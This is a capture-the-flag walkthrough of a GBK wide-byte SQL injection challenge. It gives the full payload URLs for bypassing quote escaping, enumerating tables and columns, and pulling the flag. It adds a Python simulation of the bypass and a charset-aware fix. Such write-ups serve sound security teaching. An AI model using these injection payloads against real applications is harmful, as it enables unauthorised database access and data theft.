Challenge URL:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
Challenge page content:
your sql:select id,title from news where id = '1'
Hello World!OVO
Wide-byte injection walkthrough:
Enumerate id:
id=2 gbk_sql_injection
id=3 the fourth table
The hints tell us this is a wide-byte (GBK) injection: the page escapes the single quote (addslashes-style, ' becomes \'), but MySQL decodes the query as GBK. Sending %df%27 therefore turns into %df%5c%27 after escaping, and the GBK decoder reads %df%5c as one two-byte character, swallowing the backslash and leaving the %27 quote live.
Determine the number of columns: order by 3 errors, which matches the two-column select id,title shown on the page.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+order+by+3%23
Get the database name: sae-chinalover
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,database()%23
Enumerate table names: ctf,ctf2,ctf3,ctf4,news
Here table_schema cannot be compared against the database name written as a quoted string, because the quotes would be escaped by the same filter we are bypassing; use database() or a hex literal instead (0x7361652d6368696e616c6f766572 is 'sae-chinalover', which MySQL accepts as a string without any quotes).
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7361652d6368696e616c6f766572%23
id=3 hinted at "the fourth table", i.e. ctf4.
Enumerate column names: id,flag
As above, the table name cannot be written as a quoted string, so it is replaced by its hex literal (0x63746634 is 'ctf4').
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x63746634%23
Get the flag:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,flag+from+ctf4%23
nctf{gbk_3sqli}
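To make the bypass concrete, here is an added Python model of what the challenge does to the %df%27 payload; it is not code from the challenge or the original writeup. It assumes the server escapes with a byte-oriented addslashes() and that MySQL decodes the resulting query as GBK (the latin-1 comparison, the function names, and a GBK-aware escape routine used as a stand-in for a charset-aware escape or a prepared statement are all my own choices). It also shows why the writeup's hex literals work: they carry no quotes for the filter to escape.

```python
"""Wide-byte (GBK) SQL injection, modelled byte for byte.

Added example, not code from the challenge page. No database is
contacted; queries are built as bytes and inspected the way the server
would see them after decoding them in its connection charset.
"""

# Byte values that PHP's addslashes() prefixes with a backslash: ' " \ NUL
_ESCAPED = {0x27, 0x22, 0x5C, 0x00}


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping; it knows nothing about multibyte charsets."""
    out = bytearray()
    for b in data:
        if b in _ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(user_id: bytes) -> bytes:
    """Same query shape the challenge page prints, with the escaped id inside quotes."""
    return b"select id,title from news where id = '" + addslashes(user_id) + b"'"


def unescaped_quotes(query: bytes, charset: str) -> int:
    """Count single quotes the server treats as string delimiters.

    The server decodes the bytes first. If the 0x5C inserted by addslashes()
    was absorbed into a two-byte GBK character, it is no longer a backslash
    character and escapes nothing.
    """
    text = query.decode(charset)  # strict: 0xDF 0x5C must be a valid GBK pair
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash character escapes whatever follows it
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def injection_succeeds(user_id: bytes, charset: str = "gbk") -> bool:
    """True when the quoted literal is broken open.

    The template contributes exactly two delimiters; any other count means
    a quote from the payload is live or the closing quote was neutralised.
    """
    return unescaped_quotes(build_query(user_id), charset) != 2


def hex_literal(s: str) -> str:
    """Quote-free string literal, the trick the writeup uses for table_schema/table_name."""
    return "0x" + s.encode("ascii").hex()


def escape_gbk_aware(user_id: bytes) -> bytes:
    """Charset-aware escaping (stand-in for a real escape with the connection
    charset set, or better, a prepared statement).

    Decoding strictly as GBK first means a lone lead byte such as 0xDF followed
    by 0x27 (never a valid trail byte) raises instead of being turned into a
    different, valid character by the escaping step.
    """
    text = user_id.decode("gbk")
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\0", "\\0"))
    return text.encode("gbk")


def rejects_payload(user_id: bytes) -> bool:
    """True when the charset-aware path refuses the input as invalid GBK."""
    try:
        escape_gbk_aware(user_id)
    except UnicodeDecodeError:
        return True
    return False


if __name__ == "__main__":
    payload = b"\xdf' union select 1,database()#"  # the writeup's %df%27 payload, constructed
    q = build_query(payload)
    print(q)                       # raw bytes: ... '\xdf\\' union ...
    print(q.decode("gbk"))         # as MySQL sees it: the backslash is gone
    print(injection_succeeds(payload), injection_succeeds(payload, "latin-1"))
    print(hex_literal("sae-chinalover"), hex_literal("ctf4"))
```

Decoded as GBK the query reads select id,title from news where id = '運' union select 1,database()#', which is exactly what the challenge executes; the same bytes under a single-byte charset keep the quote escaped and the injection fails. The %df%27 payload is not valid GBK at all, which is why strict decoding before escaping (or, simpler, binding the id as a parameter) closes the hole.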